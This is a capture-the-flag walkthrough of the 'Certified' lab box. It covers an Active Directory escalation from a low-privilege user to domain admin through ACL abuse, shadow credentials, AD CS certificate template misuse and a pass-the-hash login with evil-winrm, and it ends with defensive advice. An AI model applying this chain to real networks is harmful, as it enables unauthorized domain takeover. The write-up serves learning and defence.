This walkthrough covers the Certified box and focuses on an AD privilege-escalation chain that ends in full domain admin access.

Starting credentials were provided:

  • Username: judith.mader
  • Password: judith09

Recon and enumeration

Nmap and service enumeration identified a typical AD attack surface:

  • Kerberos, LDAP/LDAPS, SMB, RPC, WinRM
  • Domain controller host with AD CS present

From there I used:

  • ldapdomaindump for LDAP object visibility
  • bloodhound-python for graphing privilege paths
  • crackmapexec for SMB share and auth checks

Initial foothold and AD pathing

With judith.mader, the important finding was a path to abuse object control and group rights:

  1. Take ownership / modify ACL path on the Management group.
  2. Add judith.mader to Management.
  3. Use that leverage against management_svc.

This established a controllable path into higher-privileged identities.

Shadow credentials and service-account hash

Using Certipy shadow credentials against management_svc, I was able to:

  • Add a temporary key credential
  • Authenticate as management_svc
  • Retrieve the NT hash
  • Restore original key credentials

This gave a reusable foothold in a more privileged service account context.

AD CS abuse chain

With elevated access, I enumerated vulnerable certificate templates and found a misconfigured authentication template (CertifiedAuthentication) suitable for escalation.

High-level chain:

  1. Enumerate vulnerable templates (Certify.exe find /vuln).
  2. Abuse rights to control ca_operator.
  3. Request certificate material with attacker-controlled UPN mapping.
  4. Authenticate via certificate and recover target NT hash.
  5. Repeat toward administrator.

The key weakness was unsafe AD CS template/security configuration enabling identity pivot through certificate issuance.

Administrator access

After obtaining the administrator hash, I authenticated via WinRM:

evil-winrm -i <TARGET_IP> -u administrator -H <ADMIN_NT_HASH>

From there I retrieved root.txt and confirmed full compromise.

Key takeaways

  • AD object ownership and ACL misconfigurations can be as dangerous as plaintext creds.
  • AD CS template abuse remains one of the fastest domain escalation paths when templates are weak.
  • Service account control plus certificate abuse creates compounding risk.
  • Monitor and alert on:
    • ACL/owner changes on privileged groups/users
    • Key credential (shadow credential) anomalies
    • Suspicious certificate enrollment activity

Defensive recommendations

  • Audit and harden AD CS templates (EKUs, enrollment rights, subject controls).
  • Restrict WriteOwner/WriteDACL/GenericAll exposure on privileged objects.
  • Enforce tiered admin model and reduce standing privileges.
  • Add detections for Certipy-like behavior and abnormal certificate auth.

References